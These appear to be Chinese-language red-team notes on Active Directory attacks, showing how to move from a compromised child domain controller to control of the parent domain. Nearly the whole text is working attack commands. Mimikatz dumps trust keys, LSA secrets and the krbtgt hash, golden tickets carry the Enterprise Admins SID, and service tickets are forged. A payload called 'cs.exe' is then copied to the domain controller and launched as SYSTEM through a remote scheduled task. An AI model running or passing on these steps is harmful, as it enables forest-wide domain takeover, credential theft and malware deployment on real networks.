目录
获取域信息
在域中,Enterprise Admins组(出现在林中的根域中)的成员具有对目录林中所有域的完全控制权 限。在默认情况下,该组包含林中所有域控制器上具有Administrators权限的成员
查看当前域中计算机的权限
whoami /all
使用lg工具获取域的相关信息
查看域信任关系
shell nltest /domain_trusts
发现这是一个子域
获取当前域中的用户组
shell LG.exe abc\.
利用域信任密钥获取目标域
利用:
先拿下一个子域控,进行信息收集,从而通过子域控的用户执行命令拿下域控
1.先查看是否访问服务器:
shell dir \\dc.hack.com\c$
不能访问
2.使用mimikatz获取 当前域的 SID 父域的 SID 子域域管的NTLM 信任密钥rc4
mimikatz lsadump::trust /patch
mimikatz lsadump::lsa /patch /user:HACK$
在子域域控上进行信息收集,在子域的用户进行执行命令
在普通的域内用户中创建创建高权限票据
mimikatz kerberos::golden /domain:子域 /sid:子域SID /sids:父域-519 /rc4:信任密钥 /user:任意用户 /service:krbtgt /target:父域 /ticket:subdc_administrator.kirbi
查看是否生成成功
shell dir
上传asktgs.exe和kirbikator.exe工具,asktgs.exe伪造票据,kirbikator.exe注入票据
创建CIFS服务的票据进行复制文件的操作
shell asktgs.exe administrator.kirbi CIFS/DC.hack.com
将票据注入内存
shell kirbikator.exe lsa CIFS.DC.hack.com.kirbi
访问域控
shell dir \\dc.hack.com\c$
复制恶意文件
shell copy cs.exe \\dc.hack.com\c$
提示拒绝访问,说明没有权限,那么再伪造一个host票据
伪造结束再次复制
创建计划任务
schtasks /create /s dc.hack.com /tn test /sc onstart /tr c:\cs.exe /ru system /f
执行计划任务
schtasks /run /s dc.hack.com /i /tn "test"
最后成功上线
利用krbtgt哈希值获取目标域
利用:
获取krbtgt的散列值:
mimikatz lsadump::lsa /patch /user:krbtgt
获取关键信息:SID
mimikatz lsadump::trust /patch
构造并注入黄金票据
Kerberos::golden /user:administrator /domain:当前域名 /sid:当前SID /sids:目标域SID519 /krbtgt:krbtgt散列 /ptt
访问目标域
shell dir \\dc.hack.com\c$
复制恶意文件
执行计划任务
schtasks /create /s dc.hack.com /tn test /sc onstart /tr c:\cs.exe /ru system /f
启动计划任务:
schtasks /run /s dc.hack.com /i /tn "test"
上线
